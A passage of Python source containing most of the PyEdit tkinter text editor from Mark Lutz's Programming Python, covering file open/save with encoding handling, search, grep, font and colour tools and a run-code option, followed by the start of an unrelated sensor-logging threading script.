Mark Lutz, for O'Reilly Media, Inc.
A text editor program and embeddable object
component, written in Python/tkinter. Use
menu tear-offs and toolbar for quick access
to actions, and Alt-key shortcuts for menus.
Additions in version %s:
- supports Python 3.X
- new "grep" external files search dialog
- verifies app quit if other edit windows changed
- supports arbitrary Unicode encodings for files
- allows multiple change and font dialogs
- various improvements to the Run Code option
Prior version additions:
- font pick dialog
- unlimited undo/redo
- quit/open/new/run prompt save only if changed
- searches are case-insensitive
- startup configuration module textConfig.py
"""
START = '1.0' # index of first char: row=1,col=0
SEL_FIRST = SEL + '.first' # map sel tag to index
SEL_LAST = SEL + '.last' # same as 'sel.last'
FontScale = 0 # use bigger font on Linux
if sys.platform[:3] != 'win': # and other non-Windows boxes
FontScale = 3
################################################################################
# Main class: implements editor GUI, actions
# requires a flavor of GuiMaker to be mixed in by more specific subclasses;
# not a direct subclass of GuiMaker because that class takes multiple forms.
################################################################################
class TextEditor: # mix with menu/toolbar Frame class
startfiledir = '.' # for dialogs
editwindows = [] # for process-wide quit check
# Unicode configurations
# imported in class to allow overrides in subclass or self
if __name__ == '__main__':
from textConfig import ( # my dir is on the path
opensAskUser, opensEncoding,
savesUseKnownEncoding, savesAskUser, savesEncoding)
else:
from .textConfig import ( # 2.1: always from this package
opensAskUser, opensEncoding,
savesUseKnownEncoding, savesAskUser, savesEncoding)
ftypes = [('All files', '*'), # for file open dialog
('Text files', '.txt'), # customize in subclass
('Python files', '.py')] # or set in each instance
colors = [{'fg':'black', 'bg':'white'}, # color pick list
{'fg':'yellow', 'bg':'black'}, # first item is default
{'fg':'white', 'bg':'blue'}, # tailor me as desired
{'fg':'black', 'bg':'beige'}, # or do PickBg/Fg chooser
{'fg':'yellow', 'bg':'purple'},
{'fg':'black', 'bg':'brown'},
{'fg':'lightgreen', 'bg':'darkgreen'},
{'fg':'darkblue', 'bg':'orange'},
{'fg':'orange', 'bg':'darkblue'}]
fonts = [('courier', 9+FontScale, 'normal'), # platform-neutral fonts
('courier', 12+FontScale, 'normal'), # (family, size, style)
('courier', 10+FontScale, 'bold'), # or pop up a listbox
('courier', 10+FontScale, 'italic'), # make bigger on Linux
('times', 10+FontScale, 'normal'), # use 'bold italic' for 2
('helvetica', 10+FontScale, 'normal'), # also 'underline', etc.
('ariel', 10+FontScale, 'normal'),
('system', 10+FontScale, 'normal'),
('courier', 20+FontScale, 'normal')]
def __init__(self, loadFirst='', loadEncode=''):
if not isinstance(self, GuiMaker):
raise TypeError('TextEditor needs a GuiMaker mixin')
self.setFileName(None)
self.lastfind = None
self.openDialog = None
self.saveDialog = None
self.knownEncoding = None # 2.1 Unicode: till Open or Save
self.text.focus() # else must click in text
if loadFirst:
self.update() # 2.1: else @ line 2; see book
self.onOpen(loadFirst, loadEncode)
def start(self): # run by GuiMaker.__init__
self.menuBar = [ # configure menu/toolbar
('File', 0, # a GuiMaker menu def tree
[('Open...', 0, self.onOpen), # build in method for self
('Save', 0, self.onSave), # label, shortcut, callback
('Save As...', 5, self.onSaveAs),
('New', 0, self.onNew),
'separator',
('Quit...', 0, self.onQuit)]
),
('Edit', 0,
[('Undo', 0, self.onUndo),
('Redo', 0, self.onRedo),
'separator',
('Cut', 0, self.onCut),
('Copy', 1, self.onCopy),
('Paste', 0, self.onPaste),
'separator',
('Delete', 0, self.onDelete),
('Select All', 0, self.onSelectAll)]
),
('Search', 0,
[('Goto...', 0, self.onGoto),
('Find...', 0, self.onFind),
('Refind', 0, self.onRefind),
('Change...', 0, self.onChange),
('Grep...', 3, self.onGrep)]
),
('Tools', 0,
[('Pick Font...', 6, self.onPickFont),
('Font List', 0, self.onFontList),
'separator',
('Pick Bg...', 3, self.onPickBg),
('Pick Fg...', 0, self.onPickFg),
('Color List', 0, self.onColorList),
'separator',
('Info...', 0, self.onInfo),
('Clone', 1, self.onClone),
('Run Code', 0, self.onRunCode)]
)]
self.toolBar = [
('Save', self.onSave, {'side': LEFT}),
('Cut', self.onCut, {'side': LEFT}),
('Copy', self.onCopy, {'side': LEFT}),
('Paste', self.onPaste, {'side': LEFT}),
('Find', self.onRefind, {'side': LEFT}),
('Help', self.help, {'side': RIGHT}),
('Quit', self.onQuit, {'side': RIGHT})]
def makeWidgets(self): # run by GuiMaker.__init__
name = Label(self, bg='black', fg='white') # add below menu, above tool
name.pack(side=TOP, fill=X) # menu/toolbars are packed
# GuiMaker frame packs itself
vbar = Scrollbar(self)
hbar = Scrollbar(self, orient='horizontal')
text = Text(self, padx=5, wrap='none') # disable line wrapping
text.config(undo=1, autoseparators=1) # 2.0, default is 0, 1
vbar.pack(side=RIGHT, fill=Y)
hbar.pack(side=BOTTOM, fill=X) # pack text last
text.pack(side=TOP, fill=BOTH, expand=YES) # else sbars clipped
text.config(yscrollcommand=vbar.set) # call vbar.set on text move
text.config(xscrollcommand=hbar.set)
vbar.config(command=text.yview) # call text.yview on scroll move
hbar.config(command=text.xview) # or hbar['command']=text.xview
# 2.0: apply user configs or defaults
startfont = configs.get('font', self.fonts[0])
startbg = configs.get('bg', self.colors[0]['bg'])
startfg = configs.get('fg', self.colors[0]['fg'])
text.config(font=startfont, bg=startbg, fg=startfg)
if 'height' in configs: text.config(height=configs['height'])
if 'width' in configs: text.config(width =configs['width'])
self.text = text
self.filelabel = name
############################################################################
# File menu commands
############################################################################
def my_askopenfilename(self): # objects remember last result dir/file
if not self.openDialog:
self.openDialog = Open(initialdir=self.startfiledir,
filetypes=self.ftypes)
return self.openDialog.show()
def my_asksaveasfilename(self): # objects remember last result dir/file
if not self.saveDialog:
self.saveDialog = SaveAs(initialdir=self.startfiledir,
filetypes=self.ftypes)
return self.saveDialog.show()
def onOpen(self, loadFirst='', loadEncode=''):
"""
2.1: total rewrite for Unicode support; open in text mode with
an encoding passed in, input from the user, in textconfig, or
platform default, or open as binary bytes for arbitrary Unicode
encodings as last resort and drop \r in Windows end-lines if
present so text displays normally; content fetches are returned
as str, so need to encode on saves: keep encoding used here;
tests if file is okay ahead of time to try to avoid opens;
we could also load and manually decode bytes to str to avoid
multiple open attempts, but this is unlikely to try all cases;
encoding behavior is configurable in the local textConfig.py:
1) tries known type first if passed in by client (email charsets)
2) if opensAskUser True, try user input next (prefill wih defaults)
3) if opensEncoding nonempty, try this encoding next: 'latin-1', etc.
4) tries sys.getdefaultencoding() platform default next
5) uses binary mode bytes and Tk policy as the last resort
"""
if self.text_edit_modified(): # 2.0
if not askyesno('PyEdit', 'Text has changed: discard changes?'):
return
file = loadFirst or self.my_askopenfilename()
if not file:
return
if not os.path.isfile(file):
showerror('PyEdit', 'Could not open file ' + file)
return
# try known encoding if passed and accurate (e.g., email)
text = None # empty file = '' = False: test for None!
if loadEncode:
try:
text = open(file, 'r', encoding=loadEncode).read()
self.knownEncoding = loadEncode
except (UnicodeError, LookupError, IOError): # lookup: bad name
pass
# try user input, prefill with next choice as default
if text == None and self.opensAskUser:
self.update() # else dialog doesn't appear in rare cases
askuser = askstring('PyEdit', 'Enter Unicode encoding for open',
initialvalue=(self.opensEncoding or
sys.getdefaultencoding() or ''))
if askuser:
try:
text = open(file, 'r', encoding=askuser).read()
self.knownEncoding = askuser
except (UnicodeError, LookupError, IOError):
pass
# try config file (or before ask user?)
if text == None and self.opensEncoding:
try:
text = open(file, 'r', encoding=self.opensEncoding).read()
self.knownEncoding = self.opensEncoding
except (UnicodeError, LookupError, IOError):
pass
# try platform default (utf-8 on windows; try utf8 always?)
if text == None:
try:
text = open(file, 'r', encoding=sys.getdefaultencoding()).read()
self.knownEncoding = sys.getdefaultencoding()
except (UnicodeError, LookupError, IOError):
pass
# last resort: use binary bytes and rely on Tk to decode
if text == None:
try:
text = open(file, 'rb').read() # bytes for Unicode
text = text.replace(b'\r\n', b'\n') # for display, saves
self.knownEncoding = None
except IOError:
pass
if text == None:
showerror('PyEdit', 'Could not decode and open file ' + file)
else:
self.setAllText(text)
self.setFileName(file)
self.text.edit_reset() # 2.0: clear undo/redo stks
self.text.edit_modified(0) # 2.0: clear modified flag
def onSave(self):
self.onSaveAs(self.currfile) # may be None
def onSaveAs(self, forcefile=None):
"""
2.1: total rewrite for Unicode support: Text content is always
returned as a str, so we must deal with encodings to save to
a file here, regardless of open mode of the output file (binary
requires bytes, and text must encode); tries the encoding used
when opened or saved (if known), user input, config file setting,
and platform default last; most users can use platform default;
retains successful encoding name here for next save, because this
may be the first Save after New or a manual text insertion; Save
and SaveAs may both use last known enocding, per config file (it
probably should be used for Save, but SaveAs usage is unclear);
gui prompts are prefilled with the known encoding if there is one;
does manual text.encode() to avoid creating file; text mode files
perform platform specific end-line conversion: Windows \r dropped
if present on open by text mode (auto) and binary mode (manually);
if manual content inserts, must delete \r else duplicates here;
knownEncoding=None before first Open or Save, after New, if binary Open;
encoding behavior is configurable in the local textConfig.py:
1) if savesUseKnownEncoding > 0, try encoding from last open or save
2) if savesAskUser True, try user input next (prefill with known?)
3) if savesEncoding nonempty, try this encoding next: 'utf-8', etc
4) tries sys.getdefaultencoding() as a last resort
"""
filename = forcefile or self.my_asksaveasfilename()
if not filename:
return
text = self.getAllText() # 2.1: a str string, with \n eolns,
encpick = None # even if read/inserted as bytes
# try known encoding at latest Open or Save, if any
if self.knownEncoding and ( # enc known?
(forcefile and self.savesUseKnownEncoding >= 1) or # on Save?
(not forcefile and self.savesUseKnownEncoding >= 2)): # on SaveAs?
try:
text.encode(self.knownEncoding)
encpick = self.knownEncoding
except UnicodeError:
pass
# try user input, prefill with known type, else next choice
if not encpick and self.savesAskUser:
self.update() # else dialog doesn't appear in rare cases
askuser = askstring('PyEdit', 'Enter Unicode encoding for save',
initialvalue=(self.knownEncoding or
self.savesEncoding or
sys.getdefaultencoding() or ''))
if askuser:
try:
text.encode(askuser)
encpick = askuser
except (UnicodeError, LookupError): # LookupError: bad name
pass # UnicodeError: can't encode
# try config file
if not encpick and self.savesEncoding:
try:
text.encode(self.savesEncoding)
encpick = self.savesEncoding
except (UnicodeError, LookupError):
pass
# try platform default (utf8 on windows)
if not encpick:
try:
text.encode(sys.getdefaultencoding())
encpick = sys.getdefaultencoding()
except (UnicodeError, LookupError):
pass
# open in text mode for endlines + encoding
if not encpick:
showerror('PyEdit', 'Could not encode for file ' + filename)
else:
try:
file = open(filename, 'w', encoding=encpick)
file.write(text)
file.close()
except:
showerror('PyEdit', 'Could not write file ' + filename)
else:
self.setFileName(filename) # may be newly created
self.text.edit_modified(0) # 2.0: clear modified flag
self.knownEncoding = encpick # 2.1: keep enc for next save
# don't clear undo/redo stks!
def onNew(self):
"""
start editing a new file from scratch in current window;
see onClone to pop-up a new independent edit window instead;
"""
if self.text_edit_modified(): # 2.0
if not askyesno('PyEdit', 'Text has changed: discard changes?'):
return
self.setFileName(None)
self.clearAllText()
self.text.edit_reset() # 2.0: clear undo/redo stks
self.text.edit_modified(0) # 2.0: clear modified flag
self.knownEncoding = None # 2.1: Unicode type unknown
def onQuit(self):
"""
on Quit menu/toolbar select and wm border X button in toplevel windows;
2.1: don't exit app if others changed; 2.0: don't ask if self unchanged;
moved to the top-level window classes at the end since may vary per usage:
a Quit in GUI might quit() to exit, destroy() just one Toplevel, Tk, or
edit frame, or not be provided at all when run as an attached component;
check self for changes, and if might quit(), main windows should check
other windows in the process-wide list to see if they have changed too;
"""
assert False, 'onQuit must be defined in window-specific sublass'
def text_edit_modified(self):
"""
2.1: this now works! seems to have been a bool result type issue in tkinter;
2.0: self.text.edit_modified() broken in Python 2.4: do manually for now;
"""
return self.text.edit_modified()
#return self.tk.call((self.text._w, 'edit') + ('modified', None))
############################################################################
# Edit menu commands
############################################################################
def onUndo(self): # 2.0
try: # tk8.4 keeps undo/redo stacks
self.text.edit_undo() # exception if stacks empty
except TclError: # menu tear-offs for quick undo
showinfo('PyEdit', 'Nothing to undo')
def onRedo(self): # 2.0: redo an undone
try:
self.text.edit_redo()
except TclError:
showinfo('PyEdit', 'Nothing to redo')
def onCopy(self): # get text selected by mouse, etc.
if not self.text.tag_ranges(SEL): # save in cross-app clipboard
showerror('PyEdit', 'No text selected')
else:
text = self.text.get(SEL_FIRST, SEL_LAST)
self.clipboard_clear()
self.clipboard_append(text)
def onDelete(self): # delete selected text, no save
if not self.text.tag_ranges(SEL):
showerror('PyEdit', 'No text selected')
else:
self.text.delete(SEL_FIRST, SEL_LAST)
def onCut(self):
if not self.text.tag_ranges(SEL):
showerror('PyEdit', 'No text selected')
else:
self.onCopy() # save and delete selected text
self.onDelete()
def onPaste(self):
try:
text = self.selection_get(selection='CLIPBOARD')
except TclError:
showerror('PyEdit', 'Nothing to paste')
return
self.text.insert(INSERT, text) # add at current insert cursor
self.text.tag_remove(SEL, '1.0', END)
self.text.tag_add(SEL, INSERT+'-%dc' % len(text), INSERT)
self.text.see(INSERT) # select it, so it can be cut
def onSelectAll(self):
self.text.tag_add(SEL, '1.0', END+'-1c') # select entire text
self.text.mark_set(INSERT, '1.0') # move insert point to top
self.text.see(INSERT) # scroll to top
############################################################################
# Search menu commands
############################################################################
def onGoto(self, forceline=None):
line = forceline or askinteger('PyEdit', 'Enter line number')
self.text.update()
self.text.focus()
if line is not None:
maxindex = self.text.index(END+'-1c')
maxline = int(maxindex.split('.')[0])
if line > 0 and line <= maxline:
self.text.mark_set(INSERT, '%d.0' % line) # goto line
self.text.tag_remove(SEL, '1.0', END) # delete selects
self.text.tag_add(SEL, INSERT, 'insert + 1l') # select line
self.text.see(INSERT) # scroll to line
else:
showerror('PyEdit', 'Bad line number')
def onFind(self, lastkey=None):
key = lastkey or askstring('PyEdit', 'Enter search string')
self.text.update()
self.text.focus()
self.lastfind = key
if key: # 2.0: nocase
nocase = configs.get('caseinsens', True) # 2.0: config
where = self.text.search(key, INSERT, END, nocase=nocase)
if not where: # don't wrap
showerror('PyEdit', 'String not found')
else:
pastkey = where + '+%dc' % len(key) # index past key
self.text.tag_remove(SEL, '1.0', END) # remove any sel
self.text.tag_add(SEL, where, pastkey) # select key
self.text.mark_set(INSERT, pastkey) # for next find
self.text.see(where) # scroll display
def onRefind(self):
self.onFind(self.lastfind)
def onChange(self):
"""
non-modal find/change dialog
2.1: pass per-dialog inputs to callbacks, may be > 1 change dialog open
"""
new = Toplevel(self)
new.title('PyEdit - change')
Label(new, text='Find text?', relief=RIDGE, width=15).grid(row=0, column=0)
Label(new, text='Change to?', relief=RIDGE, width=15).grid(row=1, column=0)
entry1 = Entry(new)
entry2 = Entry(new)
entry1.grid(row=0, column=1, sticky=EW)
entry2.grid(row=1, column=1, sticky=EW)
def onFind(): # use my entry in enclosing scope
self.onFind(entry1.get()) # runs normal find dialog callback
def onApply():
self.onDoChange(entry1.get(), entry2.get())
Button(new, text='Find', command=onFind ).grid(row=0, column=2, sticky=EW)
Button(new, text='Apply', command=onApply).grid(row=1, column=2, sticky=EW)
new.columnconfigure(1, weight=1) # expandable entries
def onDoChange(self, findtext, changeto):
# on Apply in change dialog: change and refind
if self.text.tag_ranges(SEL): # must find first
self.text.delete(SEL_FIRST, SEL_LAST)
self.text.insert(INSERT, changeto) # deletes if empty
self.text.see(INSERT)
self.onFind(findtext) # goto next appear
self.text.update() # force refresh
def onGrep(self):
"""
new in version 2.1: threaded external file search;
search matched filenames in directory tree for string;
listbox clicks open matched file at line of occurrence;
search is threaded so the GUI remains active and is not
blocked, and to allow multiple greps to overlap in time;
could use threadtools, but avoid loop in no active grep;
"""
from PP4E.Gui.ShellGui.formrows import makeFormRow
# nonmodal dialog: get dirnname, filenamepatt, grepkey
popup = Toplevel()
popup.title('PyEdit - grep')
var1 = makeFormRow(popup, label='Directory root', width=18, browse=False)
var2 = makeFormRow(popup, label='Filename pattern', width=18, browse=False)
var3 = makeFormRow(popup, label='Search string', width=18, browse=False)
var1.set('.') # current dir
var2.set('*.py') # initial values
Button(popup, text='Go',
command=lambda: self.onDoGrep(var1.get(), var2.get(), var3.get())).pack()
def onDoGrep(self, dirname, filenamepatt, grepkey):
# on Go in grep dialog: populate scrolled list with matches
# tbd: should producer thread be daemon so dies with app?
import threading, queue
# make non-modal un-closeable dialog
mypopup = Tk()
mypopup.title('PyEdit - grepping')
status = Label(mypopup, text='Grep thread searching for: %r...' % grepkey)
status.pack(padx=20, pady=20)
mypopup.protocol('WM_DELETE_WINDOW', lambda: None) # ignore X close
# start producer thread, consumer loop
myqueue = queue.Queue()
threadargs = (filenamepatt, dirname, grepkey, myqueue)
threading.Thread(target=self.grepThreadProducer, args=threadargs).start()
self.grepThreadConsumer(grepkey, myqueue, mypopup)
def grepThreadProducer(self, filenamepatt, dirname, grepkey, myqueue):
"""
in a non-GUI parallel thread: queue find.find results list;
could also queue matches as found, but need to keep window;
"""
from PP4E.Tools.find import find
matches = []
for filepath in find(pattern=filenamepatt, startdir=dirname):
try:
for (linenum, linestr) in enumerate(open(filepath)):
if grepkey in linestr:
message = '%s@%d [%s]' % (filepath, linenum + 1, linestr)
matches.append(message)
except UnicodeDecodeError:
print('Unicode error in:', filepath)
myqueue.put(matches)
def grepThreadConsumer(self, grepkey, myqueue, mypopup):
"""
in the main GUI thread: watch queue for results or [];
there may be multiple active grep threads/loops/queues;
there may be other types of threads/checkers in process,
especially when PyEdit is attached component (PyMailGUI);
"""
import queue
try:
matches = myqueue.get(block=False)
except queue.Empty:
self.after(250, self.grepThreadConsumer, grepkey, myqueue, mypopup)
else:
mypopup.destroy() # close status
self.update() # erase it now
if not matches:
showinfo('PyEdit', 'Grep found no matches for: %r' % grepkey)
else:
self.grepMatchesList(matches, grepkey)
def grepMatchesList(self, matches, grepkey):
# populate list after successful matches
from PP4E.Gui.Tour.scrolledlist import ScrolledList
print('Matches for %s: %s' % (grepkey, len(matches)))
# catch list double-click
class ScrolledFilenames(ScrolledList):
def runCommand(self, selection):
file, line = selection.split(' [', 1)[0].split('@')
editor = TextEditorMainPopup(loadFirst=file, winTitle=' grep match')
editor.onGoto(int(line))
editor.text.focus_force() # no, really
# new non-modal widnow
popup = Tk()
popup.title('PyEdit - grep matches: %r' % grepkey)
ScrolledFilenames(parent=popup, options=matches)
############################################################################
# Tools menu commands
############################################################################
def onFontList(self):
self.fonts.append(self.fonts[0]) # pick next font in list
del self.fonts[0] # resizes the text area
self.text.config(font=self.fonts[0])
def onColorList(self):
self.colors.append(self.colors[0]) # pick next color in list
del self.colors[0] # move current to end
self.text.config(fg=self.colors[0]['fg'], bg=self.colors[0]['bg'])
def onPickFg(self):
self.pickColor('fg') # added on 10/02/00
def onPickBg(self): # select arbitrary color
self.pickColor('bg') # in standard color dialog
def pickColor(self, part): # this is too easy
(triple, hexstr) = askcolor()
if hexstr:
self.text.config(**{part: hexstr})
def onInfo(self):
"""
pop-up dialog giving text statistics and cursor location;
caveat (2.1): Tk insert position column counts a tab as one
character: translate to next multiple of 8 to match visual?
"""
text = self.getAllText() # added on 5/3/00 in 15 mins
bytes = len(text) # words uses a simple guess:
lines = len(text.split('\n')) # any separated by whitespace
words = len(text.split()) # 3.x: bytes is really chars
index = self.text.index(INSERT) # str is unicode code points
where = tuple(index.split('.'))
showinfo('PyEdit Information',
'Current location:\n\n' +
'line:\t%s\ncolumn:\t%s\n\n' % where +
'File text statistics:\n\n' +
'chars:\t%d\nlines:\t%d\nwords:\t%d\n' % (bytes, lines, words))
def onClone(self, makewindow=True):
"""
open a new edit window without changing one already open (onNew);
inherits quit and other behavior of the window that it clones;
2.1: subclass must redefine/replace this if makes its own popup,
else this creates a bogus extra window here which will be empty;
"""
if not makewindow:
new = None # assume class makes its own window
else:
new = Toplevel() # a new edit window in same process
myclass = self.__class__ # instance's (lowest) class object
myclass(new) # attach/run instance of my class
def onRunCode(self, parallelmode=True):
"""
run Python code being edited--not an IDE, but handy;
tries to run in file's dir, not cwd (may be PP4E root);
inputs and adds command-line arguments for script files;
code's stdin/out/err = editor's start window, if any:
run with a console window to see code's print outputs;
but parallelmode uses start to open a DOS box for I/O;
module search path will include '.' dir where started;
in non-file mode, code's Tk root may be PyEdit's window;
subprocess or multiprocessing modules may work here too;
2.1: fixed to use base file name after chdir, not path;
2.1: use StartArgs to allow args in file mode on Windows;
2.1: run an update() after 1st dialog else 2nd dialog
sometimes does not appear in rare cases;
"""
def askcmdargs():
return askstring('PyEdit', 'Commandline arguments?') or ''
from PP4E.launchmodes import System, Start, StartArgs, Fork
filemode = False
thefile = str(self.getFileName())
if os.path.exists(thefile):
filemode = askyesno('PyEdit', 'Run from file?')
self.update() # 2.1: run update()
if not filemode: # run text string
cmdargs = askcmdargs()
namespace = {'__name__': '__main__'} # run as top-level
sys.argv = [thefile] + cmdargs.split() # could use threads
exec(self.getAllText() + '\n', namespace) # exceptions ignored
elif self.text_edit_modified(): # 2.0: changed test
showerror('PyEdit', 'Text changed: you must save before run')
else:
cmdargs = askcmdargs()
mycwd = os.getcwd() # cwd may be root
dirname, filename = os.path.split(thefile) # get dir, base
os.chdir(dirname or mycwd) # cd for filenames
thecmd = filename + ' ' + cmdargs # 2.1: not theFile
if not parallelmode: # run as file
System(thecmd, thecmd)() # block editor
else:
if sys.platform[:3] == 'win': # spawn in parallel
run = StartArgs if cmdargs else Start # 2.1: support args
run(thecmd, thecmd)() # or always Spawn
else:
Fork(thecmd, thecmd)() # spawn in parallel
os.chdir(mycwd) # go back to my dir
def onPickFont(self):
"""
2.0 non-modal font spec dialog
2.1: pass per-dialog inputs to callback, may be > 1 font dialog open
"""
from PP4E.Gui.ShellGui.formrows import makeFormRow
popup = Toplevel(self)
popup.title('PyEdit - font')
var1 = makeFormRow(popup, label='Family', browse=False)
var2 = makeFormRow(popup, label='Size', browse=False)
var3 = makeFormRow(popup, label='Style', browse=False)
var1.set('courier')
var2.set('12') # suggested vals
var3.set('bold italic') # see pick list for valid inputs
Button(popup, text='Apply', command=
lambda: self.onDoFont(var1.get(), var2.get(), var3.get())).pack()
def onDoFont(self, family, size, style):
try:
self.text.config(font=(family, int(size), style))
except:
showerror('PyEdit', 'Bad font specification')
############################################################################
# Utilities, useful outside this class
############################################################################
def isEmpty(self):
return not self.getAllText()
def getAllText(self):
return self.text.get('1.0', END+'-1c') # extract text as str string
def setAllText(self, text):
"""
caller: call self.update() first if just packed, else the
initial position may be at line 2, not line 1 (2.1; Tk bug?)
"""
self.text.delete('1.0', END) # store text string in widget
self.text.insert(END, text) # or '1.0'; text=bytes or str
self.text.mark_set(INSERT, '1.0') # move insert point to top
self.text.see(INSERT) # scroll to top, insert set
def clearAllText(self):
self.text.delete('1.0', END) # clear text in widget
def getFileName(self):
return self.currfile
def setFileName(self, name): # see also: onGoto(linenum)
self.currfile = name # for save
self.filelabel.config(text=str(name))
def setKnownEncoding(self, encoding='utf-8'): # 2.1: for saves if inserted
self.knownEncoding = encoding # else saves use config, ask?
def setBg(self, color):
self.text.config(bg=color) # to set manually from code
def setFg(self, color):
self.text.config(fg=color) # 'black', hexstring
def setFont(self, font):
self.text.config(font=font) # ('family', size, 'style')
def setHeight(self, lines): # default = 24h x 80w
self.text.config(height=lines) # may also be from textCongif.py
def setWidth(self, chars):
self.text.config(width=chars)
def clearModified(self):
self.text.edit_modified(0) # clear modified flag
def isModified(self):
return self.text_edit_modified() # changed since last reset?
def help(self):
showinfo('About PyEdit', helptext % ((Version,)*2))
################################################################################
# Ready-to-use editor classes
# mixes in a GuiMaker Frame subclass which builds menu and toolbars
#
# these classes are common use cases, but other configurations are possible;
# call TextEditorMain().mainloop() to start PyEdit as a standalone program;
# redefine/extend onQuit in a subclass to catch exit or destroy (see PyView);
# caveat: could use windows.py for icons, but quit protocol is custom here.
################################################################################
#-------------------------------------------------------------------------------
# 2.1: on quit(), don't silently exit entire app if any other changed edit
# windows are open in the process - changes would be lost because all other
# windows are closed too, including multiple Tk editor parents; uses a list
# to keep track of all PyEdit window instances open in process; this may be
# too broad (if we destroy() instead of quit(), need only check check children
# of parent being destroyed), but better to err on side of being too inclusive;
# onQuit moved here because varies per window type and is not present for all;
#
# assumes a TextEditorMainPopup is never a parent to other editor windows -
# Toplevel children are destroyed with their parents; this does not address
# closes outside the scope of PyEdit classes here (tkinter quit is available
# on every widget, and any widget type may be a Toplevel parent!); client is
# responsible for checking for editor content changes in all uncovered cases;
# note that tkinter's <Destroy> bind event won't help here, because its callback
# cannot run GUI operations such as text change tests and fetches - see the
# book and destroyer.py for more details on this event;
#-------------------------------------------------------------------------------
###################################
# when text editor owns the window
###################################
class TextEditorMain(TextEditor, GuiMakerWindowMenu):
"""
main PyEdit windows that quit() to exit app on a Quit in GUI, and build
a menu on a window; parent may be default Tk, explicit Tk, or Toplevel:
parent must be a window, and probably should be a Tk so this isn't silently
destoyed and closed with a parent; all main PyEdit windows check all other
PyEdit windows open in the process for changes on a Quit in the GUI, since
a quit() here will exit the entire app; the editor's frame need not occupy
entire window (may have other parts: see PyView), but its Quit ends program;
onQuit is run for Quit in toolbar or File menu, as well as window border X;
"""
def __init__(self, parent=None, loadFirst='', loadEncode=''):
# editor fills whole parent window
GuiMaker.__init__(self, parent) # use main window menus
TextEditor.__init__(self, loadFirst, loadEncode) # GuiMaker frame packs self
self.master.title('PyEdit ' + Version) # title, wm X if standalone
self.master.iconname('PyEdit')
self.master.protocol('WM_DELETE_WINDOW', self.onQuit)
TextEditor.editwindows.append(self)
def onQuit(self): # on a Quit request in the GUI
close = not self.text_edit_modified() # check self, ask?, check others
if not close:
close = askyesno('PyEdit', 'Text changed: quit and discard changes?')
if close:
windows = TextEditor.editwindows
changed = [w for w in windows if w != self and w.text_edit_modified()]
if not changed:
GuiMaker.quit(self) # quit ends entire app regardless of widget type
else:
numchange = len(changed)
verify = '%s other edit window%s changed: quit and discard anyhow?'
verify = verify % (numchange, 's' if numchange > 1 else '')
if askyesno('PyEdit', verify):
GuiMaker.quit(self)
class TextEditorMainPopup(TextEditor, GuiMakerWindowMenu):
"""
popup PyEdit windows that destroy() to close only self on a Quit in GUI,
and build a menu on a window; makes own Toplevel parent, which is child
to default Tk (for None) or other passed-in window or widget (e.g., a frame);
adds to list so will be checked for changes if any PyEdit main window quits;
if any PyEdit main windows will be created, parent of this should also be a
PyEdit main window's parent so this is not closed silently while being tracked;
onQuit is run for Quit in toolbar or File menu, as well as window border X;
"""
def __init__(self, parent=None, loadFirst='', winTitle='', loadEncode=''):
# create own window
self.popup = Toplevel(parent)
GuiMaker.__init__(self, self.popup) # use main window menus
TextEditor.__init__(self, loadFirst, loadEncode) # a frame in a new popup
assert self.master == self.popup
self.popup.title('PyEdit ' + Version + winTitle)
self.popup.iconname('PyEdit')
self.popup.protocol('WM_DELETE_WINDOW', self.onQuit)
TextEditor.editwindows.append(self)
def onQuit(self):
close = not self.text_edit_modified()
if not close:
close = askyesno('PyEdit', 'Text changed: quit and discard changes?')
if close:
self.popup.destroy() # kill this window only
TextEditor.editwindows.remove(self) # (plus any child windows)
def onClone(self):
TextEditor.onClone(self, makewindow=False) # I make my own pop-up
#########################################
# when editor embedded in another window
#########################################
class TextEditorComponent(TextEditor, GuiMakerFrameMenu):
"""
attached PyEdit component frames with full menu/toolbar options,
which run a destroy() on a Quit in the GUI to erase self only;
a Quit in the GUI verifies if any changes in self (only) here;
does not intercept window manager border X: doesn't own window;
does not add self to changes tracking list: part of larger app;
"""
def __init__(self, parent=None, loadFirst='', loadEncode=''):
# use Frame-based menus
GuiMaker.__init__(self, parent) # all menus, buttons on
TextEditor.__init__(self, loadFirst, loadEncode) # GuiMaker must init 1st
def onQuit(self):
close = not self.text_edit_modified()
if not close:
close = askyesno('PyEdit', 'Text changed: quit and discard changes?')
if close:
self.destroy() # erase self Frame but do not quit enclosing app
class TextEditorComponentMinimal(TextEditor, GuiMakerFrameMenu):
"""
attached PyEdit component frames without Quit and File menu options;
on startup, removes Quit from toolbar, and either deletes File menu
or disables all its items (possibly hackish, but sufficient); menu and
toolbar structures are per-instance data: changes do not impact others;
Quit in GUI never occurs, because it is removed from available options;
"""
def __init__(self, parent=None, loadFirst='', deleteFile=True, loadEncode=''):
self.deleteFile = deleteFile
GuiMaker.__init__(self, parent) # GuiMaker frame packs self
TextEditor.__init__(self, loadFirst, loadEncode) # TextEditor adds middle
def start(self):
TextEditor.start(self) # GuiMaker start call
for i in range(len(self.toolBar)): # delete quit in toolbar
if self.toolBar[i][0] == 'Quit': # delete file menu items,
del self.toolBar[i] # or just disable file
break
if self.deleteFile:
for i in range(len(self.menuBar)):
if self.menuBar[i][0] == 'File':
del self.menuBar[i]
break
else:
for (name, key, items) in self.menuBar:
if name == 'File':
items.append([1,2,3,4,6])
################################################################################
# standalone program run
################################################################################
def testPopup():
# see PyView and PyMail for component tests
root = Tk()
TextEditorMainPopup(root)
TextEditorMainPopup(root)
Button(root, text='More', command=TextEditorMainPopup).pack(fill=X)
Button(root, text='Quit', command=root.quit).pack(fill=X)
root.mainloop()
def main(): # may be typed or clicked
try: # or associated on Windows
fname = sys.argv[1] # arg = optional filename
except IndexError: # build in default Tk root
fname = None
TextEditorMain(loadFirst=fname).pack(expand=YES, fill=BOTH) # pack optional
mainloop()
if __name__ == '__main__': # when run as a script
#testPopup()
main() # run .pyw for no DOS box
|
mainThreading.py
|
# Main.py with threading!
# Python program to illustrate the concept
# of threading
# importing the threading module
import threading
import smbus #import SMBus module of I2C
import RTIMU
from time import sleep #import
import adafruit_gps
import time
import struct
import board
import busio
import digitalio as dio
from circuitpython_nrf24l01 import RF24
import serial
import os
import can
import obd
import xlwt
from xlwt import Workbook
from math import degrees
global row, buffer, isFinished
row = 1
buffer = [struct.pack("if",-1,-1.0)]*17
isFinished = [False]*4
class ExceptionThread(threading.Thread):
""" LogThread is a class dedicated to handling
exceptions within specific threads to prevent
the application from crashing.
"""
def __init__(self,msg, **kwargs):
super().__init__(**kwargs)
self.errmsg = msg
self._real_run = self.start
self.start = self.execute
def execute(self):
